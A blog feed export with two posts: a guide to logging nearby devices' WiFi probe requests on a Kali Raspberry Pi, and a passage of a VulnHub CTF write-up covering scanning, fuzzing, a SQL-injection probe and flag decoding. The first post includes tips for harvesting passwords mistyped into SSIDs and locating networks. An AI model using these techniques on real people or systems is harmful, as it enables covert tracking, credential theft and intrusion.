tag:blogger.com,1999:blog-83565305149657088402024-03-19T05:23:00.940+01:00A day with TapeUnknownnoreply@blogger.comBlogger52125tag:blogger.com,1999:blog-8356530514965708840.post-90613777291153486982019-02-18T16:43:00.002+01:002019-02-18T16:46:19.786+01:00RPI & WiFi probes<div dir="ltr" style="text-align: left;" trbidi="on">
<br />
<br />
<b>HARDWARE:</b><br />
- RPI3 B+<br />
- HDMI cable for connection to monitor during initial setup<br />
- USB keyboard for initial setup<br />
- USB mouse for initial setup<br />
- 16GB MicroSD card and adapter for Kali image installation<br />
- Wireless dongle<br />
<br />
<b>INSTALLATION & PREPARATION FOR A HEADLESS (NO KEYBOARD/NO MONITOR) SETUP</b><br />
1. Download the Kali image for the Raspberry Pi<br />
<a href="https://www.offensive-security.com/kali-linux-arm-images/">https://www.offensive-security.com/kali-linux-arm-images/</a><br />
<a href="https://images.offensive-security.com/arm-images/kali-linux-2018.4-rpi3-nexmon.img.xz">https://images.offensive-security.com/arm-images/kali-linux-2018.4-rpi3-nexmon.img.xz</a><br />
Validate the hash..<br />
<br />
2. Flash the Kali image onto the MicroSD card using a tool such as Etcher<br />
<a href="https://www.balena.io/etcher/">https://www.balena.io/etcher/</a><br />
<div>
<br />
3. Edit the default password<br />
- Log in with the default root:toor username/password .<br />
- In console enter '<span style="color: lime;">passwd</span>'<br />
- Enter your new password and confirm by entering a second time.<br />
<br />
4. Edit the SSH host keys<br />
All ARM images are pre-configured with the same keys, so it's imperative to edit the SSH keys.<br />
<span style="color: lime;">update-rc.d -f ssh remove</span><br />
<span style="color: lime;">update-rc.d -f ssh defaults</span><br />
<span style="color: lime;">cd /etc/ssh/</span><br />
<span style="color: lime;">mkdir insecure_old</span><br />
<span style="color: lime;">mv ssh_host_* insecure_old</span><br />
<span style="color: lime;">dpkg-reconfigure openssh-server</span><br />
<span style="color: lime;">service ssh restart</span><br />
<br />
5. Allow for autologin as it will be running as a headless unit and being plugged in and out a bit.<br />
- Edit file (uncomment 2 lines) /etc/lightdm/lightdm.conf<br />
<span style="color: lime;">autologin-user=root<br />autologin-user-timeout=0</span><br />
<br />
- Edit file (comment out a line) /etc/pam.d/lightdm-autologin<br />
<span style="color: lime;">#auth required pam_succeed_if.so user != root quiet_success</span><br />
<br />
<br />
<div>
6. reboot to test if all working OK, the device should boot straight into desktop!</div>
<div>
<div>
<br /></div>
<div>
<br /></div>
</div>
<div>
!NB </div>
<div>
I did try updating/upgrading the system and it fubarred the system, requiring a full reinstall.</div>
<div>
So for this project no other tools or upgrades were installed.</div>
<div>
<br /></div>
<div>
<div>
<br /></div>
<div>
So now the RPI is setup, all that remains is to plug in the WiFi dongle and put a few scripts on the RPI to assist in the logging and viewing of WiFi probes.</div>
<div>
<br />
Before setting up the scripts, I first prepared a working directory;<br />
<span style="color: lime;">mkdir /root/probemon</span><br />
<br />
and then download a oui.txt file to the RPI to view Vendor information when available, you can download the sanitized version or the original version, they will both work in providing Vendor information when available, on the MAC addresses;<br />
<div>
<a href="https://linuxnet.ca/ieee/oui.txt">https://linuxnet.ca/ieee/oui.txt</a></div>
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: "Times New Roman"; font-size: medium; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<div style="margin: 0px;">
<a href="http://standards-oui.ieee.org/oui.txt">http://standards-oui.ieee.org/oui.txt</a></div>
</div>
<span style="color: lime;">wget https://linuxnet.ca/ieee/oui.txt -O /root/probemon/oui.txt</span><br />
<div>
<br /></div>
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: "Times New Roman"; font-size: medium; font-style: normal; font-variant-caps: normal; font-variant-ligatures: normal; font-weight: 400; letter-spacing: normal; orphans: 2; text-align: left; text-decoration-color: initial; text-decoration-style: initial; text-indent: 0px; text-transform: none; white-space: normal; widows: 2; word-spacing: 0px;">
<div style="margin: 0px;">
<br /></div>
</div>
The idea runs off 3 scripts; </div>
<div>
<b>1) probemon.sh</b><br />
The main script to monitor for WiFi probes, write backup files after reaching a certain size and logging restarts of the script.<br />
<br />
<blockquote class="tr_bq">
<span style="color: lime;">#!/usr/bin/bash<br />DIR="/root/probemon/" # Directory for the working file and logs<br />PROBELOG=probemon.txt # Working file logging WiFi probes<br />STARTLOG=monlog.txt # File logging script start times and backup creation<br />#<br />#<br /># Identify which interface is network connected and which is free for placing in monitor mode<br />for i in $(/usr/sbin/ifconfig | grep wlan | sed 's/:.*$//g'); do<br /> INET=$(/usr/sbin/ifconfig "$i" | grep inet)<br /> if [ "$INET" == "" ] ; then IFACE=$i ; fi<br /> break<br />done<br />#<br />#<br />DATE=$(date +%F_%T) # Current date in human readable format<br />SIZE=$(ls -l "$DIR$PROBELOG" | awk '{print $5}') #Working file size<br />BKUP="$DATE"_"$PROBELOG" # Dated backup filename<br />#<br /># Check size of working file, if over 2MB move to backup file.<br />if (($SIZE > 2000000)) ; then<br /> mv "$DIR$PROBELOG" "$DIR$BKUP"<br /> # Create entry of backup file created in log.<br /> echo "moved log $PROBELOG to $BKUP" >> "$DIR$STARTLOG"<br />fi<br />#<br />/usr/sbin/ifconfig $IFACE down<br />/usr/sbin/iwconfig $IFACE mode monitor<br />/usr/sbin/ifconfig $IFACE up<br />#<br />#<br />echo -ne "started with $IFACE -- " >> "$DIR$STARTLOG" && date +%F_%T >> "$DIR$STARTLOG"<br />#<br />tshark -i $IFACE -n -l -f "subtype probereq" -T fields -e frame.time_epoch -e wlan.sa -e radiotap.dbm_antsignal -e wlan.ssid -E quote=d 2> /dev/null >> "$DIR$PROBELOG"</span></blockquote>
<br />
<b>2) moncheck.sh</b><br />
A very basic script which I saved to /etc/cron.hourly/ and called by a cronjob every minute to check whether probemon.sh is running and if not, to restart it.<br />
<blockquote class="tr_bq">
<span style="color: lime;">#!/usr/bin/bash<br />#<br />RUNNING=$(ps -aux | grep probemon.sh | grep -v grep)<br />#<br />if [ "$RUNNING" == "" ] ; then<br /> /usr/bin/bash /root/scripts/probemon.sh<br />fi</span></blockquote>
Make sure the script is executable;<br />
<blockquote class="tr_bq">
<span style="color: lime;">chmod 755 /etc/cron.hourly/moncheck.sh</span></blockquote>
<br />
and then make a crontab entry;<br />
<blockquote class="tr_bq">
<span style="color: lime;">crontab -e</span></blockquote>
<blockquote class="tr_bq">
<span style="color: lime;">*/1 * * * * /etc/cron.hourly/moncheck.sh</span></blockquote>
<br />
<b>3) liveparse.sh</b><br />
A script that parses information piped to it and makes the date human readable, checks for Vendor information and allows to filter with a whitelist, blacklist or no filter.<br />
whitelist / blacklist are text files with line separated MAC addresses.<br />
<blockquote class="tr_bq">
<span style="color: lime;">#!/bin/bash<br />#liveparse.sh #Script to pipe info into.<br />HOMEDIR="/root/probemon/" #specify home directory<br />OUI="$HOMEDIR"oui.txt<br />WHITE="$HOMEDIR"whitelist.txt<br />BLACK="$HOMEDIR"blacklist.txt<br />BLACKLIST=false<br />WHITELIST=false<br />SIMPLE=false<br />#<br />#<br />if [ ! -f "$HOMEDIR"oui.txt ] ; then<br /> OUI=$(locate oui.txt | head -n 1) #Find a file with oui information<br />fi<br />#<br />f_blacklist() {<br />while read line ; do<br /> MAC=$(echo $line | cut -d \" -f 4)<br /> BLACKLISTED=$(grep -i $MAC $BLACK)<br /> if [ ! "$BLACKLISTED" == "" ] ; then<br /> MACB16=$(echo $MAC | sed 's/://g' | cut -c 1-6)<br /> MACOUI=$(grep -i "$MACB16" "$OUI" | sed -e 's/^.*(base 16)//' -e 's/[ \t]*//')<br /> if [[ "$MACOUI" == "" ]] ; then<br /> MACOUI="No Info"<br /> fi<br /> DT=$(echo $line | awk '{print $1}' | sed 's/"//g')<br /> DATE=$(date -d @"$DT" +%F_%T)<br /> PWR=$(echo $line | cut -d \" -f 6)<br /> SSID=$(echo $line | cut -d \" -f 8)<br /> printf '%-22s %-20s %-8s %-15s %-10s\n' "$DATE" "$MAC" "$PWR" "$SSID" "$MACOUI"<br /> fi<br />done<br />}<br />#<br />f_whitelist() {<br />while read line ; do<br /> MAC=$(echo $line | cut -d \" -f 4)<br /> WHITELISTED=$(grep -i $MAC $WHITE)<br /> if [ "$WHITELISTED" == "" ] ; then<br /> MACB16=$(echo $MAC | sed 's/://g' | cut -c 1-6)<br /> MACOUI=$(grep -i "$MACB16" "$OUI" | sed -e 's/^.*(base 16)//' -e 's/[ \t]*//')<br /> if [[ "$MACOUI" == "" ]] ; then<br /> MACOUI="No Info"<br /> fi<br /> PWR=$(echo $line | cut -d \" -f 6)<br /> SSID=$(echo $line | cut -d \" -f 8)<br /> DT=$(echo $line | awk '{print $1}' | sed 's/"//g')<br /> DATE=$(date -d @"$DT" +%F_%T)<br /> printf '%-22s %-20s %-8s %-15s %-10s\n' "$DATE" "$MAC" "$PWR" "$SSID" "$MACOUI"<br /> fi<br />done<br />}<br />#<br />f_simple() {<br />while read line ; do<br /> DT=$(echo $line | awk '{print $1}' | sed 's/"//g')<br /> DATE=$(date -d @"$DT" +%F_%T)<br /> MAC=$(echo $line | cut -d \" -f 4)<br /> MACB16=$(echo $MAC | sed 's/://g' | cut -c 1-6)<br /> MACOUI=$(grep -i "$MACB16" "$OUI" | sed -e 's/^.*(base 16)//' -e 's/[ \t]*//')<br /> if [[ "$MACOUI" == "" ]] ; then<br /> MACOUI="No Info"<br /> fi<br /> PWR=$(echo $line | cut -d \" -f 6)<br /> SSID=$(echo $line | cut -d \" -f 8)<br /> printf '%-22s %-20s %-8s %-15s %-10s\n' "$DATE" "$MAC" "$PWR" "$SSID" "$MACOUI"<br />done<br />}<br />#<br /># OPTION FUNCTIONS<br />########################################################################<br />while getopts ":bsw" opt; do<br /> case $opt in<br /> b) BLACKLIST=true ;;<br /> s) SIMPLE=true ;;<br /> w) WHITELIST=true ;;<br /> esac<br />done<br />#<br />if [ $# -eq 0 ] ; then<br /> f_simple<br />elif [ $SIMPLE == true ] ; then<br /> f_simple<br />elif [ $BLACKLIST == true ] ; then<br /> f_blacklist<br />elif [ $WHITELIST == true ] ; then<br /> f_whitelist<br />fi<br />#</span></blockquote>
<br />
<br /></div>
</div>
Some one liners as an example;<br />
<br />
View the logfile as it is written, without a whitelist filter.<br />
<span style="color: lime;">tail -f probemon/probemon.txt | bash scripts/liveparse.sh</span><br />
with whitelist filter;<br />
<span style="color: lime;">tail -f probemon/probemon.txt | bash scripts/liveparse.sh -w</span><br />
<br />
Check when certain MAC addresses were in the vicinity;<br />
<span style="color: lime;">grep -i <partial mac=""> <partial mac="">logfile.txt | bash scripts/liveparse.sh</partial></partial></span><br />
<br />
Concatenating all log files into 1 large file, then doing some grepping can reveal interesting informaiton.<br />
<br />
For instance, to see whether some may have accidentally entered a password into the SSID field of a device, you could sort all the SSIDs and see whether any SSIDs look like they may actually be a password;<br />
<span style="color: lime;">cut -d \" -f 8 logfile.txt | sort -u</span><br />
<br />
On finding a likely candidate, you can then grep the file for the MAC address and see what other SSIDs are associated with that MAC address.<br />
Chances are the possible password will be for one of the SSIDs also being broadcasted.<br />
Sites like wigle.net will even show you locations of SSIDs.<br />
<br />
See which SSIDs are being broadcasted by which MAC addresses.<br />
This will quickly show if a portable appliance is broadcasting multiple SSIDs<br />
Note that some portable appliances now broadcast random MAC addresses.<br />
<span style="color: lime;">cut -d \" -f 4,8 --output-delimiter=$'\t' logfile.txt | sort -u</span><br />
<br />
<br />
Although this is all old as dirt, its still interesting.<br />
The accidental password entry was what really surprised me as it appears to be more common than I would have imagined.<br />
<br />
<br />
<div>
<br /></div>
<br />
<br />
<br /></div>
</div>
Unknownnoreply@blogger.com0tag:blogger.com,1999:blog-8356530514965708840.post-54372787281928377792017-04-26T17:20:00.002+02:002017-04-26T17:57:27.746+02:00VulnHub -- D0Not5top -- Writeup<div dir="ltr" style="text-align: left;" trbidi="on">
<div dir="ltr" style="text-align: left;" trbidi="on">
<b><br /></b>
<b>Trying not to stop with D0Not5top.. </b><br />
This was a wild ride indeed! Excellent fun 3mrgnc3, job well done indeed :)<br />
<br />
Was playing this together with a couple of THS buds and we were having a blast at being frustrated to high hell and back by this thing.. never did get all flags, but the path to root was a fun one and will look forward to seeing how others managed to get what we did not.<br />
<br />
<i><span style="font-size: x-small;">There are 2 IPs used in the below examples for the VM as I was switching between host-only and bridged.</span></i><br />
<br />
<span style="font-size: large;"><i><b>Initial enumeration</b></i></span><br />
======================<br />
Started off with the usual scans;<br />
> <i>Host discovery</i><br />
> <i>Port scanning</i><br />
> <i>Open port services checks</i><br />
> <i>Forced browsing</i><br />
> <i>Website source info gathering</i><br />
<br />
<b><u>Host discovery</u></b><br />
<span style="color: lime;">arp-scan 192.168.56.0/24</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/host_discovery_zpsc1dcvw7z.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="188" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/host_discovery_zpsc1dcvw7z.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<b><u>Port scanning</u></b><br />
<span style="color: lime;">nmap -p- 192.168.56.102</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nmap_1_zpsjx1nogao.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="346" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/nmap_1_zpsjx1nogao.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
So we have some ports to look at; ssh smtp & http stand out as good ones to focus on (I'll admit I went digging at the rpc ports when all else was looking a tad bleak.. lol).<br />
<br />
<b>Port 22 SSH </b><br />
I decide to wait with further checks on SSH until more enumeration done and possible usernames have been enumerated. <i><span style="font-size: x-small;">More on this later...</span></i><br />
<br />
<b>Port 25 SMTP </b><br />
Doing a banner grab on the smtp port gives us an interesting string;<br />
<span style="color: lime;">nc 192.168.56.102 25</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nc_smtp_zpsuakkoyii.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="102" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/nc_smtp_zpsuakkoyii.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Decoding with xxd gives us another flag! yay!<br />
<span style="color: lime;">echo "46 4c 34 36 5f 33 3a 32 396472796 63637756 8656874 327231646434 717070756 5793437 347 3767879610a" | xxd -r -ps</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/smtp_hex_zpske7o4qcn.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="154" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/smtp_hex_zpske7o4qcn.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Hrmmph.. flag 3.. missed a couple.. search continues.<br />
<br />
<b>Port 80 HTTP </b><br />
Oh dear Xenu, the leetspeek continues...<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/http_80_zpsti6nnoms.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="200" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/http_80_zpsti6nnoms.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Nothing in the source of the page root, so time to bust out nikto to have a closer look at what might be lurking;<br />
<span style="color: lime;">nikto -h 192.168.56.102</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/nikto_zpsbss4lmcy.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="464" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/nikto_zpsbss4lmcy.png" width="640" /></a><br />
<br />
after an initial AHAH! WordPress! moment of joy, happiness quickly turns to disappointment when it becomes apparent that the wordpress references are all blank page tr0lls.. bah..<br />
<br />
Checking the robots.txt we see some interesting information at the bottom of the robots.txt;<br />
<span style="color: lime;">curl 192.168.56.102/robots.txt</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/robots_zpstzw2ncez.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="610" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/robots_zpstzw2ncez.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
# terminal knows where to go.<br />
User-agent: GameTerminal<br />
<br />
Alrighty then.. so terminal knows where to go and User-Agent is GameTerminal..<br />
Tried with setting the user agent to GameTerminal for shits and giggles, but that did not aid in any process.<br />
<br />
OK, next step to have a see if forced browsing can reveal any 'hidden' pages;<br />
<br />
<b><u>Forced Browsing</u></b><br />
Running dirb (dirb http://192.168.56.102) gives a lot of hits and so I switch to wfuzz to be able to better sort the output.<br />
<span style="color: lime;">wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt --hc 404 192.168.56.102/FUZZ</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wfuzz_1_zpsvbjjvafu.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="484" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/wfuzz_1_zpsvbjjvafu.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Still a lot of hits with a lot of empty pages.. but changing the syntax just a tad to only show html 200 codes and be recursive down to 3 directories gives a clearer view of none-empty pages ;<br />
<span style="color: lime;">wfuzz -c -w /usr/share/seclists/Discovery/Web_Content/common.txt -R 3 --sc 200 192.168.56.102/FUZZ</span><br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/wfuzz_2_zpsimv7smgz.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="510" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/wfuzz_2_zpsimv7smgz.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
We find a page in the <i><b>/control/</b></i> directory in which a 'DNS Control Panel' is illustrated.<br />
MegustaAdmin is shown to be logged in, so note this as possible username.<br />
Going through the page sources of the found /control page shows and we have another flag!<br />
<!-- FL46_1:urh8fu3i039rfoy254sx2xtrs5wc6767w --><br />
Going down a bit further and we have some text;<br />
<i><span style="color: yellow;"><!-- M3gusta said he hasn't had time to get this w0rKING. <br />Don't think he's quite in the 20n3 these days since his MadBro made that 7r4n5f3r, Just Couldnt H@cxk Da D0Not5topMe.ctf --!> </span></i><br />
Another possible username noted and looking further we find that the directory <i><b>/control/js/</b></i> is listable and see a README.MadBro file lurking..;<br />
<pre><span style="color: yellow;">###########################################################
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #
# M4K3 5UR3 2 S3TUP Y0UR /3TC/H05T5 N3XT T1M3 L0053R... #
# 1T'5 D0Not5topMe.ctf !!!! #
# 1M 00T4 H33R.. #
# MadBro MadBro MadBro MadBro MadBro MadBro MadBro MadBro #
###########################################################
FL101110_10:111101011101
1r101010q10svdfsxk1001i1
11ry100f10srtr1100010h10</span></pre>
<br />
Aha! So we need to edit the hosts file and include the domain D0Not5topMe with domain extension .ctf AND we have found flag #2!<br />
<pre><span style="color: yellow;">FL101110_10:111101011101</span></pre>
This string is partially binary, which when decoded to decimal equates to;<br />
FL46_2:3933<br />
Or if we take the 2nd part 6 chars at a time;<br />
FL46_2:6129<br />
Either way, it doesnt seem to hint at anything else.<br />
<pre><span style="color: yellow;">1r101010q10svdfsxk1001i1
11ry100f10srtr1100010h10</span></pre>
<div>
These strings underneath the partial binary appear to be Crypt16 hashes, but after trying all sorts of various string alterations and decodings, did not dig further on this.</div>
<pre></pre>
<pre></pre>
<b><span style="font-size: large;"><i>Checking domains</i></span></b><br />
======================<br />
<b><u>D0Not5topMe.ctf</u></b><br />
OK, so after editing the /etc/hosts file to include D0Not5topMe.ctf and pointing our browser to that domain, we are presented with a board / forum named "Worka Suko Gameo Di Besto"<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/forum_zpsqtltu1th.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="456" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/forum_zpsqtltu1th.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Further description of the forum appears to be Pig Latin;<br />
<i>"<span style="color: yellow;">emay ayingplay uchmay amesgay ownay egistrarioray arnay edsay emay emailway ayay egustomay otay indfay away eomay ideyhohay</span>"</i><br />
Which, as far as google can tell me, translates roughly to;<br />
<i>"<span style="color: yellow;">me playing much games now registrario rna sed me wemail a megusto to find wa meo hideyho</span>"</i><br />
OK, so it appears it is advising to register to the board and send an email to megusto to find out where he is hiding...<br />
<br />
Further we can see that Megusta is the only current member of the board and trying to login with;<br />
<i>username: megusta</i><br />
<i>password: megusta</i><br />
gives us a response of incorrect password.<br />
Trying to login with;<br />
<i>username: m3gu5t4</i><br />
<i>password: m3gu5t4</i><br />
gives us a response of incorrect username, so we can enumerate the username, but was not able to do more than that.<br />
<br />
After registering an account (<i>needed to be online for that, hence the bridged IP</i>) we are able to add Megusta as a friend, further confirming the valid username, however I couldn't figure out how to send a message to Megusta which is what I think the PigLatin translation is advising to do.. ¯\_(ツ)_/¯<br />
<br />
Spent a lot of time on the User Control Panel as it seemed the right place to be for an SQLi, LFI or RFI... but I now have a feeling it was one big tr0ll.. oh les tr0lls..<br />
<br />
When forcing an error with an attempted sql injection (http://d0not5topme.ctf/ucp.php?sid=0ea605a35c24e11610ecc7ee1aebe621&i=%27%20or%20%271=%271) we get a response mentioning an email address for Megusta; Megusta@g4m35.ctf<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/general_error_zps9qad5ekq.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="264" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/general_error_zps9qad5ekq.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Spent too long trying to use this information to see how it may help in sending a message to dear old Megusta.. however to no avail.<br />
<br />
So is it another valid new domain? Entered in hosts file and fired it up in browser.. Oh yeah!<br />
<br />
<b><u>g4m35.ctf</u></b><br />
This turns out to be a stress / fury / homicidal tendancy inducing 3d missile game.. which I have found I am very, very bad at..<br />
I had a shot (ha) at trying to hack the game to see if anything appears at the end, as it must have a hint somewhere.. but failed miserably..<br />
<br />
Then luckily chron1cl3 came to the rescue who had come up with a nice novel way of testing domains with possible domains based on enumerated names and leetified strings from the hints in robots.txt and had found another domain!<br />
<br />
Comparing the response sizes from a curl --header Host request, we can see whether responses are new domains or non-existing domains which revert back to the webroot;<br />
<span style="color: lime;">curl -s --header "Host: test.ctf" 192.168.1.144</span><br />
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/domain_test01_zpsoreviesn.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="290" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/domain_test01_zpsoreviesn.png" width="640" /></a><br />
<br />
Using this and knowing that .ctf is a valid domain extension, we can do a rudimentary scan of possible domains with curl;<br />
<div>
<span style="color: lime;">for i in $(cat leet.txt);do echo -ne "$i -- " && curl -s --header "Host: $i.ctf" 192.168.1.144 | wc -c ; done</span></div>
<div>
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/DOMAIN_TEST2_zpsxnx40yqv.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="256" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/DOMAIN_TEST2_zpsxnx40yqv.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
AhYiss!</div>
t3rm1n4l.ctf has a different response size and appears to be a valid domain, so lets enter it in hosts file and see what we're looking at.<br />
<br />
Mkay. A terminal emulator requiring some form of authentication.<br />
After a lot of trial and error found the correct Passwordo: t3rm1n4l.ctf <br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/terminal_01_zpsf9wkio0q.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="352" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/terminal_01_zpsf9wkio0q.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Checking what commands the terminal emulator accepts shows that this is very limited, after going through numerous checks and getting rather frustrated with the constant renewed login requirement (omg 3mrgnc3.. teh tr0lls..) Pimp chron1cl3 found that grep worked and was able to do a file / dir listing with grep *<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/terminal_02_zpsi7tzvize.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="352" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/terminal_02_zpsi7tzvize.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
Oooh yeeeah...<br />
<br />
So checking this new domain M36u574.ctf with the curl --header Host method, we see that the response is different from the webroot, so looks like another new domain!<br />
<span style="color: lime;">curl -s --header "Host: M36u574.ctf" 192.168.1.144 | wc -c</span><br />
<br />
Entering the new domain into our hosts file and viewing in browser, we are presented with a load of megusta memes on rotation stretching the full size of the browser for Meg's beauty's sake..<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/megustameg_zpsxv41ef8k.jpg" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/megustameg_zpsxv41ef8k.jpg" width="320" /></a></div>
<br />
<br />
I wanted to grab all pics and the directory wasn't listable, so to ensure I didnt miss anything I fired up OWASP ZAP and switched the proxy on in the browser.(I use Proxy Switcher add-on in the browser)<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap_zpssh1qbcmo.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" height="388" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/zap_zpssh1qbcmo.png" width="640" /></a></div>
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
<br />
After loading up the M36u574.ctf site and letting it run for a bit, I had all the images and proceeded to download the raw body of the response from ZAP for further analysis.<br />
<br />
Some quick checks on the image files with file, exiftool & hd shows that kingmegusta.jpg is of interest as there appears to be some base64 in the image comment.<br />
<span style="color: lime;">for i in $(ls *.raw); do echo ; exiftool $i ; done</span><br />
<br />
For the sake of covering our bases I also ran a quick check on the footers of the files to see if anything pasted on the end of the files or anything out of the ordinary, besides padding and an actual png file insead of a jpeg nothing noteworthy found.<br />
<span style="color: lime;">for i in $(ls *.raw) ; do echo $i; hd $i | tail -n10; done</span><br />
<br />
So back to the suspected base64 in the comment of kingmegusta..<br />
<span style="color: lime;">exiftool -comment kingmegusta.raw | sed 's/^.*: //' | base64 -d</span><br />
<div>
<a href="http://i94.photobucket.com/albums/l112/TAPE_RULEZ/hash_01_zpsxnjkaz6u.png" imageanchor="1" style="clear: left; display: inline !important; margin-bottom: 1em; margin-right: 1em; text-align: center;"><img border="0" height="136" src="https://i94.photobucket.com/albums/l112/TAPE_RULEZ/hash_01_zpsxnjkaz6u.png" width="640" /></a></div>
<div>
<br /></div>
<div>
ooohhh yeaaah... hash FTW!</div>
<div>
